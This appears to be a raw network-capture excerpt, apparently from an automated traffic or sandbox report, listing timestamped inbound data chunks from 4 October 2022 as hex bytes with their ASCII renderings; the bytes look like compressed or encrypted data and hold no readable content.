                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30456INData Raw: aa 31 25 55 27 75 98 da 7b 99 b1 4a 17 b7 83 8e 45 ab f6 38 70 ca 93 83 b0 77 50 99 c7 c2 e3 8b 4b e8 db 34 53 47 ef 79 e2 97 32 e3 6e 68 37 b3 f3 2b ce f3 50 bc 5b a8 d4 34 c5 5e 68 42 09 16 5c 6e 9d 87 04 26 fe be 86 06 bd 43 b0 98 1d ff c3 0a 73 82 03 9c 07 27 8e ab d0 f3 dc 4f 02 a9 4c 47 18 3f 31 3c 78 e4 8b 5b 34 d0 57 64 59 1d 53 f6 03 d5 24 ba 45 b5 f3 64 a2 6d b6 65 a6 72 94 f0 fa 3f df 16 c8 6c 81 65 b0 92 1d fb 17 38 df 9e b5 01 63 d8 de 8b 27 5f 07 ce 34 d4 00 eb c6 f9 ac 5d a8 58 78 dd cf 07 48 37 33 c6 a4 3a d8 d1 13 cd 5e bc b7 6b 98 6d fb ab f1 08 f6 cf f0 42 1b b3 9a fc 7f 74 4d 36 8a 33 10 d3 38 bd 44 9c 48 4d 55 f9 f3 27 d7 47 79 3b 80 0e d8 d5 e5 d5 f5 64 33 a5 0f d1 78 16 55 97 60 12 78 57 0c 54 31 ac 83 dd af 7c f9 56 5b 30 ef f9 ea
                                                                                                                                                                                                                                    Data Ascii: 1%U'u{JE8pwPK4SGy2nh7+P[4^hB\n&Cs'OLG?1<x[4WdYS$Edmer?le8c'_4]XxH73:^kmBtM638DHMU'Gy;d3xU`xWT1|V[0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30472INData Raw: 2d 1f eb b8 c7 2b 92 18 4c a2 50 88 c0 89 34 ca f3 c8 8c bb d5 d2 7c b0 28 ae 6f 11 83 b6 df 39 af a9 a5 f4 43 86 68 de b9 f9 ba 9f cf 07 68 85 39 79 97 f9 0a eb 63 fd b0 67 ce e6 ff 10 07 53 10 e3 33 f9 10 ff 40 cb f5 c8 73 c3 07 21 ad 96 1f 3d e6 0c 6a 1e b3 db c0 fc 13 c6 bf c3 95 4c 8b 98 ac 6c 87 c4 6d 4e 3d e2 d8 a5 3b 96 06 91 ba db 1a 59 28 96 25 4f 3d 4f f7 b9 65 45 a9 5d 6d 8e 0d f1 5d e7 04 e4 df 1a 2b b5 27 59 57 5d 91 05 40 c5 0b b5 c5 f8 71 89 e2 d0 6e 0f 05 61 2b 4e 5b d6 7d fd 7a 2e 4a 02 ea 36 79 87 1c e1 5e 53 41 09 62 78 6a 6e e8 7e 6c 93 0f e2 31 68 6d b3 6a 78 3d 97 55 b0 da c4 45 3f 79 49 29 2d df 51 24 71 01 6b 69 25 1b ef 1f 74 8a ff 84 8b 87 02 17 da 29 4c 92 fe bb 6f 3d 4f 87 f4 1f bc cb bf b6 ce df f7 70 71 70 bd 36 bd a7 12 03
                                                                                                                                                                                                                                    Data Ascii: -+LP4|(o9Chh9ycgS3@s!=jLlmN=;Y(%O=OeE]m]+'YW]@qna+N[}z.J6y^SAbxjn~l1hmjx=UE?yI)-Q$qki%t)Lo=Opqp6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30488INData Raw: 14 32 6b 9d 08 67 92 21 42 70 8c 1e 69 f3 c3 51 03 2c f1 4c 02 18 f3 a9 cc 04 a3 f7 b1 1b ef e9 5d 14 b8 c0 bf f0 d8 81 76 16 0a 24 74 8e 93 1d 7a fc c7 00 a2 b1 6d 39 96 dd 76 89 00 79 01 08 b9 a3 51 8d 3a 82 68 11 a9 2f 7b 42 84 ad 0e ca 84 32 e6 32 a3 89 d3 43 7e d2 e2 ed 0a d2 91 67 50 c3 d7 86 bc 9f fd 13 ac 2a 0f f3 fa d7 77 f7 3b e7 be b5 6a 9c 23 18 1a 04 6c 20 95 6d 28 d2 74 e3 a7 f9 f3 13 8c cd 87 a1 2a 0a cd 17 ee 00 9c 96 8d db 4d 40 ba ee 42 b3 4b 94 7e 84 df dc 7c e2 ae 9e 5a ce a8 09 94 d3 8b 63 fa b7 51 67 7a d3 26 f7 c5 b4 d8 f0 82 df 09 d4 e1 e4 34 44 a7 56 c2 b8 ed 52 90 a0 76 fa 70 38 75 b2 aa 4a cc d3 b2 c3 d1 1b b9 33 ca cd 1b 28 27 1c 9f 8e b9 4a 92 7d de c6 05 e7 4b 09 3f 39 70 99 ec 09 af 9e 56 2e 68 76 61 47 85 47 b9 f4 b0 a7 a6
                                                                                                                                                                                                                                    Data Ascii: 2kg!BpiQ,L]v$tzm9vyQ:h/{B22C~gP*w;j#l m(t*M@BK~|ZcQgz&4DVRvp8uJ3('J}K?9pV.hvaGG
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30504INData Raw: 36 b1 a5 f7 5b 1e cc d4 97 e5 23 3b 59 47 55 e4 72 e7 aa 7c 88 66 d4 e0 3c 50 0e 9b 8d 37 e3 7b fd ec 22 14 92 2b 82 17 a2 b8 9c 80 9e f3 23 a6 95 d9 8e 88 bd 6f 6a f8 f4 42 c3 30 87 b5 8b 8d 49 b6 e3 12 c6 65 0b 70 64 5f 2d 1c 08 76 44 48 b7 76 be 0c 21 a8 02 69 9b 4f 3c 52 d7 9f 7c 54 1a 61 c8 fb 0e 2d 50 0b 1e 30 43 23 a3 8a 8e f0 5c 11 73 8d 4b 1b bb 73 5d 07 16 84 58 f2 49 15 6e f5 09 12 d6 24 84 15 49 12 17 a4 e6 6a c9 5d bc 6b 1c d3 5e 9c 47 be 33 09 a0 c6 bd b9 ea 30 01 e2 fc 80 90 39 ee cf 3e bd 04 17 e6 2c 62 5c b4 93 e5 c0 e2 9f 09 ef e6 0f 94 31 65 ec a5 eb a6 74 46 b8 16 d4 6d a3 7c 9e 01 38 15 49 c1 5c bd 75 76 5e ac 15 c1 9b a5 c9 ba 69 d1 0a 8f 4a 25 df ff c5 14 ef 99 bd 3b d5 27 66 6a ff b2 88 b2 57 45 4d dc df d4 da cb 8d 62 90 1d b1 64
                                                                                                                                                                                                                                    Data Ascii: 6[#;YGUr|f<P7{"+#ojB0Iepd_-vDHv!iO<R|Ta-P0C#\sKs]XIn$Ij]k^G309>,b\1etFm|8I\uv^iJ%;'fjWEMbd
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30520INData Raw: 84 13 24 55 af 08 ee 1d 40 07 1a 1e a4 22 db 13 44 cd fc 6f b2 5a 35 48 66 f8 11 e1 e6 f1 0f d8 af 2a 16 67 18 fc e6 0c 1b e9 35 99 ed b6 b5 a2 96 8b de fe f4 64 7d 49 d8 17 63 8a 37 c3 5b 06 92 e4 70 e4 11 f8 ed 3e b9 75 e0 32 eb fd d1 dd 12 fa 93 20 d1 65 7b cd 51 06 61 8a 9b 22 4d 80 be c5 f2 e7 25 11 01 c8 ea 88 52 1f f8 99 dd 7d 4a 9f 3b ff 7e ea 33 3c 52 39 f0 9a b5 b0 95 c0 56 57 75 99 b9 27 51 da b2 51 35 68 7b 75 3f f0 db e1 74 83 2f 6e 42 46 0e ec f8 70 79 5c b0 c4 b1 9d 38 30 f4 5e d6 12 21 90 e0 7b 1d c7 90 f0 0e 8a b3 ac 66 d8 81 a0 46 37 79 8e 26 b1 e0 fe 41 6b 64 a1 f9 40 59 aa 14 a9 5b f9 56 4e db 77 ac 2c 93 ed 71 58 77 b6 88 d6 cf 51 99 8c 00 1f d6 64 4c 2b d4 7e 3a e2 dd 67 e0 5b d5 34 ae 8a f3 4f 32 fb 88 d8 e2 05 6e 8f e2 73 6c fb 74
                                                                                                                                                                                                                                    Data Ascii: $U@"DoZ5Hf*g5d}Ic7[p>u2 e{Qa"M%R}J;~3<R9VWu'QQ5h{u?t/nBFpy\80^!{fF7y&Akd@Y[VNw,qXwQdL+~:g[4O2nslt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30536INData Raw: d1 ea e1 ca 39 2c e3 29 82 a6 72 33 58 3a b9 52 fe e6 8d 7b be cd ce e0 e8 4d b7 ec e0 07 c4 59 d8 ce 81 9c 5f 29 41 04 ac 11 2a a9 b3 b3 fe 0f 0a 57 35 38 a4 3e e9 62 ea de 36 c0 b9 1a 4e 74 5f 73 b6 79 c9 78 b9 40 9a 05 0f c9 6f e3 f2 e5 55 ea d0 8e ea e0 0c 52 d5 c1 2f 58 14 36 92 cd 63 4d 6d 5f aa 10 d9 eb 98 d6 2f 55 33 a2 ad 6f 1f 96 ab 72 5b 48 07 8e e1 c5 70 81 98 18 2e e8 85 ba 72 1c b7 7e df e6 5e e5 81 ab 55 d1 13 18 fd 6e f8 41 25 51 e8 e2 3d 97 48 1c 70 ce 91 14 ad fa bc f0 13 25 1f 42 bc 4a b1 a0 7a c4 ee 28 fe bd 30 7e 4e ef 44 3d e8 b3 44 a4 f7 96 6e 7e a2 75 35 2a 3b 6a f8 35 08 d4 e5 d6 71 1d d8 25 23 dc ce 77 73 f2 cc 0f 95 73 06 87 d4 ff a9 65 51 81 f2 b0 0d 37 99 43 82 08 d8 2f 2c 77 d5 0a a7 ff bd 0e c6 f1 19 b3 bf b9 d8 59 e1 e4 1a
                                                                                                                                                                                                                                    Data Ascii: 9,)r3X:R{MY_)A*W58>b6Nt_syx@oUR/X6cMm_/U3or[Hp.r~^UnA%Q=Hp%BJz(0~ND=Dn~u5*;j5q%#wsseQ7C/,wY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30552INData Raw: 67 d9 64 42 f7 b8 74 37 83 19 0e 42 e2 87 88 8b 74 eb 6d 76 12 ab 93 21 0f 41 09 35 96 84 20 b2 fa f6 50 89 3e 71 8f 0d f9 32 06 ff 83 04 26 5d 54 d2 e1 f0 90 c5 7e 82 29 8c a8 ca 04 d9 12 9c 75 58 a3 67 36 18 da af d3 f8 52 bc 1b 2f 59 df 32 3d 92 66 8d 3d 72 7d 1e b4 81 0e 10 7a 57 0c 2b 8a a8 0b 94 30 47 17 9b f6 cc 4f 6a d9 c6 c1 91 1f 31 c8 e0 4c 57 4b f8 fc c3 8f 47 47 53 74 f6 9a 4c 4d 78 3f 9f f0 c2 02 58 04 7e 66 36 4a 8a 37 64 a7 04 07 04 3b e5 b5 51 fd 6f 66 44 d3 3f 8b ff ff ab 1f 5f 6a 02 17 02 47 72 fd ba 0e 9f 43 1a 9d 56 57 93 7c 12 78 25 1b 15 a6 13 5f fb 96 ef ad 61 42 fb 4c cd f7 b1 75 c6 c4 62 ae a2 88 5b 8c 64 a5 a1 fb fc e5 7f 5a 24 b7 40 0e 1f f7 4e 0d 5f 81 e6 ee 5e 73 bd 03 af bf 7e d0 4f 79 23 88 6a 59 c2 06 01 ec 25 09 4b 7d 69
                                                                                                                                                                                                                                    Data Ascii: gdBt7Btmv!A5 P>q2&]T~)uXg6R/Y2=f=r}zW+0GOj1LWKGGStLMx?X~f6J7d;QofD?_jGrCVW|x%_aBLub[dZ$@N_^s~Oy#jY%K}i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30568INData Raw: d9 50 26 1b 6c cd e4 5f 7b 0f a8 d0 bc 38 4d 35 81 b9 68 0f e1 1a 57 79 a9 4e af c1 84 4d ce 5c 80 e6 66 42 5d 9e 44 70 ac 5d 58 ad b4 cb c3 c3 33 95 a2 f3 c7 70 11 35 03 bd 89 e3 9f 23 4d 3d 03 5b cc 0f e4 c0 a6 a2 f2 10 7d 2b aa ba 7e 86 e1 61 2b 3a b2 e6 7a 98 d2 54 ea a5 5d 2a 3b 1d 38 93 25 f0 9c d3 ec 92 3a 12 76 f6 47 f9 e2 ac 8d d8 8f 88 76 3c 42 7c c0 65 87 af 5c 01 42 71 b6 08 2c 88 60 21 38 42 07 2e 61 99 cd 6d 3e cb 6e 8f 54 27 c3 c2 06 a1 ab c3 75 b1 e0 15 8e 9b c2 18 66 0d a5 02 62 df ae 60 ac 5c dc 96 f8 ca 63 3a 2d bb ae 3b 1d ca 69 61 ae ad b2 e3 d1 1e 33 20 9a 7f 98 52 3e 65 b0 f6 82 9b 5e 5b f7 66 c5 db 43 19 06 01 58 ee 09 b8 2f 58 d8 22 52 eb f7 69 61 35 c0 d9 df 82 78 99 d0 0c 73 b0 46 a8 f0 cb 32 db b4 d2 26 1f 6d f9 07 f4 21 46 b6
                                                                                                                                                                                                                                    Data Ascii: P&l_{8M5hWyNM\fB]Dp]X3p5#M=[}+~a+:zT]*;8%:vGv<B|e\Bq,`!8B.am>nT'ufb`\c:-;ia3 R>e^[fCX/X"Ria5xsF2&m!F
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30584INData Raw: 2e 38 4b 13 a4 90 44 e4 19 a9 ee 5c 45 c5 82 9b c3 58 fb e0 e4 f8 b1 62 17 12 53 6b 0d 5d 1a 8f 49 cf 74 7b 3d ea 1f 33 e6 b2 35 84 0f 65 19 4c 25 c8 1c 61 b9 f3 4a 34 d8 7e 74 bb 10 8c dc 9d 23 5b f6 93 c2 b2 e7 54 e9 fc 59 fa 43 73 46 2a b0 ca 39 90 e6 f9 0a b9 22 71 c5 71 f2 70 92 09 2c 31 f9 7e c2 10 19 cf 3e 70 b8 fb 98 f4 e6 89 9a 37 0d 38 ef e4 da 91 b9 f2 32 46 ab 58 16 0d 8f 46 5d 7d b4 18 ae 20 7e a6 72 8b ea 0e ff 5f c4 cc fc ce 3e 05 ca 43 48 40 5e d8 13 c8 29 d4 fb 81 ca fc 8d 53 ad 9c 4c 3d ca 98 6e 99 ba e4 e8 3f f2 7b c4 53 ab d8 43 bc 34 29 3f ec 86 8e 93 1f ce 19 f3 b4 dd 94 6b d8 97 ec 46 64 05 b8 31 09 39 8a 9e 78 a0 70 f9 82 91 ef 62 2e dc ea 4c eb a0 83 69 f3 04 ec 33 5b f6 82 6f 9a 5f 6b 48 2c ea e2 b0 1a 5b 9c d3 2e 0c 01 b4 79 60
                                                                                                                                                                                                                                    Data Ascii: .8KD\EXbSk]It{=35eL%aJ4~t#[TYCsF*9"qqp,1~>p782FXF]} ~r_>CH@^)SL=n?{SC4)?kFd19xpb.Li3[o_kH,[.y`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30600INData Raw: f4 b0 a9 35 e5 b3 11 c7 ae 28 64 56 f7 e0 42 21 4e f1 d7 52 e5 c1 aa 6d bc 72 17 04 75 58 1e c2 f7 65 ad 3c 4f 91 34 d1 df 63 3e 03 71 1b 0f e4 c1 a9 7f 4c fd 65 d5 3d 33 ef a2 90 e0 21 8a 92 b1 fa 1b 26 95 d7 dd 82 90 2b 2a c3 3e b4 1e b0 d7 92 1f ed 98 79 07 8a f5 d8 8e 9c b1 b8 a4 4a b0 93 a9 36 85 19 6a b4 ed f1 64 6c 24 ec ba fa a7 5a 97 d3 1f 69 9b 1e 0a 38 d3 bc 14 d7 a8 3b 29 ec 8a bb 78 4c 67 18 d3 42 f9 43 18 52 90 b4 6d 53 2a 40 10 9f ec 1a 97 f9 30 63 40 dd 58 dd c3 ba 83 5a 58 00 c1 d4 da 85 d4 8d 54 9a 22 b6 fc 21 e3 b2 e7 f0 c7 cc 12 91 45 3d 8c d7 38 f6 bf 83 d5 06 89 97 aa 05 67 03 5d 0d 35 3b d7 15 e4 2f 8e 35 54 27 6a 1b a2 5d 3f 64 f5 cd 6f 3a f0 23 e5 5e c3 7f 1d 25 82 bf 98 f9 89 de e1 27 1a a4 8a 62 67 64 78 b7 9e 31 e1 20 4a f9 f2
                                                                                                                                                                                                                                    Data Ascii: 5(dVB!NRmruXe<O4c>qLe=3!&+*>yJ6jdl$Zi8;)xLgBCRmS*@0c@XZXT"!E=8g]5;/5T'j]?do:#^%'bgdx1 J
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30616INData Raw: 73 af 58 5f d0 71 cc 5e c5 3f ee ac d6 44 7d 2e d6 55 e1 13 b7 be 07 ab 1c b7 bf 95 05 26 da e8 07 61 ae 75 24 51 35 57 d7 9c d9 79 45 67 eb b4 8a 07 fb 7e d3 8d 7d a8 c4 b6 07 e9 c0 19 2c b6 d0 9d 52 28 d2 2f b5 84 20 b7 df e5 b1 e7 ec 8d 1b 37 b8 2d 3f f9 ce 58 ca 45 5d 84 62 b5 e0 8c fb dc 73 4a 15 2b 18 18 8d 77 9b 69 a4 28 eb aa 61 9f 16 ea b4 89 47 ae 89 ec 72 16 4a d2 ad d1 34 9e f9 02 b9 47 00 34 76 1e 51 ca ea 30 b8 0a 03 7d 3c 57 ab df d7 8f 87 9b 34 42 90 0c d5 d8 c5 05 17 a3 55 0d 11 d8 26 b4 7c fb 9b 73 91 17 b0 dc fd 5f cd 02 f3 58 e1 8d 61 20 b3 34 df 0d ac fa 96 e0 53 03 af 33 64 a2 07 91 51 7b 43 19 36 73 59 23 c8 8b a5 94 f8 01 34 89 92 de 76 33 b7 74 43 27 df 5c 41 ef f9 63 18 fc bc 27 e6 28 e7 13 bb a4 97 b4 40 10 b2 0c 00 a1 fe f0 d9
                                                                                                                                                                                                                                    Data Ascii: sX_q^?D}.U&au$Q5WyEg~},R(/ 7-?XE]bsJ+wi(aGrJ4G4vQ0}<W4BU&|s_Xa 4S3dQ{C6sY#4v3tC'\Ac'(@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30632INData Raw: f0 38 31 11 a2 be 81 13 39 d8 63 df fd c0 df be fb 31 79 18 8c 54 b2 6e 8c f8 a2 f9 d1 85 d1 a3 09 a3 9e bd e5 2d b0 a1 cc eb 7b 25 c6 f8 1e 75 84 2b b0 4d 3c e0 07 db d6 9a db 79 f6 8d e4 d3 46 a3 ae 34 fa 42 7c 5b ae 0e ae 5b 3a f5 28 21 20 81 ed ba 73 09 7a f6 4f ae 06 94 53 65 4d a3 38 cd a1 25 f9 8c 41 27 ac 92 db 63 d8 ca 4a 20 9e af d5 f9 b3 3e 2d 6b e4 65 68 a8 8e 27 f0 02 0b 71 d8 6f 2f b5 44 23 2c df 9f dd a3 d2 e6 2a fb b2 02 da 26 24 9b 19 bf a2 1d 2a da ba 16 89 41 05 ea b8 4e 5b 62 c7 6d 68 3c fd b5 a1 24 c5 9d 2d 2e 51 4a 19 8a 8d 61 26 05 b7 7c 5f 9f 73 9e 7a 01 bc 88 74 6d 71 74 6f f7 0f ad 03 31 8b a0 dc 59 3b ed c6 c7 95 40 35 53 ff ce 2a 4e d2 1b 86 41 c0 ec 55 93 8e 03 43 85 b3 d6 b2 e4 17 e7 a9 01 20 d8 ca 65 40 01 88 84 ad 4d e0 ce
                                                                                                                                                                                                                                    Data Ascii: 819c1yTn-{%u+M<yF4B|[[:(! szOSeM8%A'cJ >-keh'qo/D#,*&$*AN[bmh<$-.QJa&|_sztmqto1Y;@5S*NAUC e@M
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30648INData Raw: 6a 1a 6f fb 42 25 43 cb da ab 05 f3 95 c5 44 18 9b c5 2b e9 63 31 30 37 a9 07 ae 81 a3 f8 50 a2 3b c9 41 1e ba af 75 4a eb 97 4b ad 65 bc 84 5c 83 39 8e 9b 64 dd 0e d0 5c c8 7c 85 11 f4 ca e1 a8 07 a4 e7 9b aa 33 75 b5 e6 4c 34 4b 9e 94 c4 b9 d5 b3 e3 e1 81 f1 79 13 e5 e1 b1 8a a6 12 95 69 75 07 59 a2 63 35 b4 bc 8a 11 f2 0b a1 f6 0a d5 5d 65 ad 60 5e 11 d6 75 32 19 44 e1 1b 58 97 46 76 01 54 1b 8e 72 20 a9 f1 cf 9c 7f 02 83 a9 1f 31 16 b3 58 23 7d 99 57 2d 22 0a 6e 69 9e 52 38 4d 9d 0e b3 1f 85 4f 77 be 8d 2d 85 0b a8 79 74 c4 c7 ac e3 85 eb d0 b9 aa 82 42 2a 78 7d 67 e5 1a ef 10 fc 60 b0 fa 95 f3 dd 7b 3c d7 00 bd fd 17 a5 e2 35 f8 c1 b4 4f 40 8e ed c9 a6 56 55 d8 eb 36 1a 9a 26 c4 6e c0 3a e8 24 d7 48 33 84 b5 77 6c 81 85 45 bb 19 09 89 da b3 f3 a8 e2
                                                                                                                                                                                                                                    Data Ascii: joB%CD+c107P;AuJKe\9d\|3uL4KyiuYc5]e`^u2DXFvTr 1X#}W-"niR8MOw-ytB*x}g`{<5O@VU6&n:$H3wlE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30664INData Raw: dd f9 3c 50 2b 76 39 86 af fe f4 03 e4 68 f2 a2 0d 19 b5 0e 58 d0 ea 32 2e 96 12 cc c1 be 8a 9a c1 20 c9 e0 02 89 64 bd 53 5d a4 88 6b 64 4e 81 d9 a4 84 ee eb 3b 04 8a 26 ab af 6f 89 94 2e 89 15 8d 63 69 a7 a1 35 ee 92 45 15 40 22 9e f6 eb e5 1b 8b bb 31 25 f1 13 36 a1 7b 25 49 d4 6e 3b aa 98 d2 27 c4 30 e0 ac 67 85 7b c1 6f 89 3e 5f 8b f7 64 c0 af dc e6 67 e8 bf a6 c5 de a0 2e ad 3c 93 2e 8b 91 75 f1 c6 cc 85 81 d0 93 db a9 a6 4a 26 94 53 3b af 58 20 89 ae fb 51 9a bc e4 34 36 67 42 31 2e 48 27 dc 6c 3f 44 14 66 1f 1d a3 61 a6 91 86 6d 30 eb 4f 71 44 bd d3 20 04 ec bc da 94 c4 60 5a 49 34 3d f7 09 d9 e4 a4 6e 27 5f fb 89 58 98 b2 b3 21 b5 63 e0 18 88 2d 8a ab a5 c3 ed ad 3f 71 17 0b 8d c9 28 9a d1 11 96 d3 52 19 45 66 c1 d9 94 4d fd ba 12 34 08 ed fb 89
                                                                                                                                                                                                                                    Data Ascii: <P+v9hX2. dS]kdN;&o.ci5E@"1%6{%In;'0g{o>_dg.<.uJ&S;X Q46gB1.H'l?Dfam0OqD `ZI4=n'_X!c-?q(REfM4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30680INData Raw: 02 74 f5 69 9d 9b 2d a0 e7 1e b8 9b d4 d9 3c b0 ab 0f ba 78 81 44 2d 71 1f 7a 46 3e ec e2 fc 29 6f 37 69 2b a1 76 d9 fd f9 1f a1 c0 db 97 b2 10 fd 29 59 8d 1f af 1e e4 ed 22 1c 1e 9a cf f8 2d 8c f0 eb 86 1a 17 9b c0 0c 3c 92 31 96 6c e9 f8 64 ae fa f9 b1 64 6e cb f3 08 8f 68 98 24 a5 af 36 2f c1 b0 e2 7d 18 39 27 db a8 c7 fb e3 65 87 ec ed 5f 19 bc 97 af d3 fe fd d6 03 d3 47 62 f5 d0 6b 13 27 1e 62 72 29 47 64 16 cd 22 d8 45 b8 5f 42 ed 22 5c 96 34 af 77 d4 df c0 a6 bd 27 f4 4d bd c3 4d d2 8d 60 e1 42 52 9b 6c f2 3f 3c 07 52 1b 66 7a 9f f2 15 23 9e 10 13 f2 91 d6 fc 04 1c b0 34 4e 91 0f e1 60 53 36 a2 07 19 c0 9d c0 fd 46 13 c9 0f 6c a0 17 fd b2 fb 72 26 ce 9b 9d 6c 91 7f dd 58 88 1c ab de d9 19 6f 36 ca 53 59 06 be 81 22 63 4a b0 90 6f 87 86 ef dc fa a4
                                                                                                                                                                                                                                    Data Ascii: ti-<xD-qzF>)o7i+v)Y"-<1lddnh$6/}9'e_Gbk'br)Gd"E_B"\4w'MM`BRl?<Rfz#4N`S6Flr&lXo6SY"cJo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30696INData Raw: b4 c3 22 84 4e 1b 33 9a 1b 2b fc 56 e1 ff ae 9a f0 7b 92 cd 35 80 e9 c1 01 a4 d2 e8 38 90 fe 43 c5 8e 0a 4c 6b cb a4 ff 3e c8 8c d9 af fc 03 20 31 cf 26 ef 7c 77 98 d3 52 e8 a3 e1 90 9b 30 27 f3 a3 f2 23 27 56 0d 4a 88 94 36 39 3b 47 63 21 de 57 8f eb ae fb d6 6c 4f 1e c0 b8 ed e5 60 a1 a6 59 b2 06 8a 83 fd 13 84 47 c8 7f 36 1c e8 15 96 0b 45 9a ad 8c 11 d1 22 db 6f e7 06 28 ae 7c f8 24 4d ad 2a a1 2c 97 49 f8 6c f0 b2 95 1c 9d 52 c6 a4 7e 87 ce fd fb 91 1d d0 29 12 c4 9a 4c 34 e1 4d 31 5b d3 03 13 3e 61 72 08 5c 29 40 17 2c a2 3a 1b 4d 9e 9c f2 ad 24 9e 82 a1 72 90 71 7e 81 d7 0b df a0 0d e4 94 4a cc 46 4a 18 6f aa dc ca 17 43 db 3e 7e 73 4e 83 02 11 f2 7b 4f e1 5a 0a f9 7f ca 20 dc 95 7b 6b 74 81 e9 8f e4 bb ab 5f 48 43 50 e5 e6 2c 81 87 63 43 a6 68 3a
                                                                                                                                                                                                                                    Data Ascii: "N3+V{58CLk> 1&|wR0'#'VJ69;Gc!WlO`YG6E"o(|$M*,IlR~)L4M1[>ar\)@,:M$rq~JFJoC>~sN{OZ {kt_HCP,cCh:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30712INData Raw: d4 4f c6 96 0d da 54 18 24 c8 9b cb e0 bc 4b 79 b6 61 23 9e 58 01 bf 1c 1a 92 57 cb 81 9c 86 56 b0 68 9e 36 19 d9 6b 71 3e bc e4 e5 7f eb 33 72 70 9c d5 4f 0d 4f f1 dc 8d cf 43 ef 23 ae ed 91 df 9b 20 17 da 42 d8 d1 46 4f bb b4 9e fd 15 b4 63 ba 54 af 44 61 d7 b2 b5 a5 62 65 1f a3 8f 5f 83 90 9e e2 23 20 15 3b dd a5 ce 58 64 c0 01 61 a9 c3 1b 04 9b 46 be 90 7a 58 6e fb dd 4e e1 3e 6d ee 32 f8 64 31 cf c7 7b 91 09 94 4f d4 3a 30 f7 9f 91 7a 22 b7 62 30 90 5a ad 4e 83 89 7d 65 bd 3c ce ed 73 e7 6a b6 83 3b 6a 43 f0 15 69 38 5e fd d0 fe bc d8 4f a4 2e e1 19 b1 61 f3 3d a5 73 e2 bd 7d b7 d0 28 f5 b8 c3 9a 44 7f da 9b 50 1f 2f 3a 6b a1 e7 67 e6 ce cb 2c a0 65 11 07 40 81 72 58 ae 6c f4 a8 26 26 a4 35 55 ab ff c6 db 77 b9 12 51 06 1c 42 42 9b f2 70 9d 27 8f aa
                                                                                                                                                                                                                                    Data Ascii: OT$Kya#XWVh6kq>3rpOOC# BFOcTDabe_# ;XdaFzXnN>m2d1{O:0z"b0ZN}e<sj;jCi8^O.a=s}(DP/:kg,e@rXl&&5UwQBBp'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30728INData Raw: 2e e5 6a 0c e9 38 cc c5 59 ed bb 60 61 0a 47 19 6d 81 4c 02 60 22 10 8d 5a 2a 10 5f 03 74 33 56 08 12 2f 20 26 41 ac 0d 32 9d 55 7b a5 d3 82 71 8c 0a b0 fe c8 7f 85 4a 87 cc c6 84 e0 a1 12 62 85 e7 9b d8 ea 36 9f 38 c5 68 63 b5 10 1d 12 8d 7a 50 90 1e d7 c9 e1 67 e9 c9 a2 52 2c c8 d0 38 0f 4e 24 a8 98 0a a7 85 ec 94 8f a7 fc 59 97 c4 84 a9 01 d4 7e 28 ed 42 ec a5 2f 87 f1 89 ba e9 40 81 33 03 52 fc 85 dc fc 24 26 cf b9 f2 48 3d c7 50 67 6a 78 5e 2a 85 9c 6d 5b f5 8f f4 a1 25 35 3c df 7e 91 15 43 0b 6c 3e a7 7a d2 bb 33 b9 1b e0 96 26 e0 c9 0e e2 c4 83 3a 00 df 32 42 6c d7 f5 4e 7b ef 09 5c 35 73 f5 90 3c 44 0e 15 c5 ea 2e 34 a4 04 25 8e 89 bc 8a 4c 7c b4 9f 60 8f a0 37 1f cc a8 d1 4d d8 b6 60 bd b4 63 e0 9b 1c 4e 92 17 64 6b 50 4c 93 e2 e3 46 2e 1e d8 95
                                                                                                                                                                                                                                    Data Ascii: .j8Y`aGmL`"Z*_t3V/ &A2U{qJb68hczPgR,8N$Y~(B/@3R$&H=Pgjx^*m[%5<~Cl>z3&:2BlN{\5s<D.4%L|`7M`cNdkPLF.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30744INData Raw: 51 ec c7 f6 4c 58 ff 2a 22 75 59 bb 04 72 d4 99 51 de c9 cc c5 ee 19 54 d0 dc f6 60 4e d5 1a 1a 5b 56 76 46 0c a6 68 93 c1 f0 11 5c 6e 76 37 a3 a9 cb ef c0 55 10 a2 25 c4 fa 7c 79 02 1e 34 ea a9 c6 ad 94 eb 65 81 5a c5 47 d0 27 3a 5b eb ab 5b fe 98 a9 92 8b 7d ec 8d 50 50 c3 8b c5 52 1f 79 ee 5f a4 e0 3c 88 a3 92 35 91 5a 53 0e 25 8a 40 29 5f 72 04 37 f1 ce 16 22 77 51 61 7e a0 5c b6 85 51 8d 63 41 d6 03 c5 48 60 18 5a 03 68 d4 aa 2d 27 06 a1 e2 3b 42 57 32 cf 62 a9 28 e1 76 c2 31 b2 8d 81 db ca 09 72 bf d5 c5 1b 7f 0c c5 e3 33 2e 9b cb 07 b1 8c 8d 91 f3 4a 5a b0 ee f4 14 bf 4f 3f 7c d8 57 4b d5 5d 95 c9 ea 3d 11 3e 87 08 13 72 16 55 7e 11 32 58 67 eb 11 44 8f ea 52 ce 81 15 be 9a 26 79 4b e9 32 4a 93 c6 a0 18 ba f3 0e 44 b8 6f 40 c5 77 0f 10 74 99 94 09
                                                                                                                                                                                                                                    Data Ascii: QLX*"uYrQT`N[VvFh\nv7U%|y4eZG':[[}PPRy_<5ZS%@)_r7"wQa~\QcAH`Zh-';BW2b(v1r3.JZO?|WK]=>rU~2XgDR&yK2JDo@wt
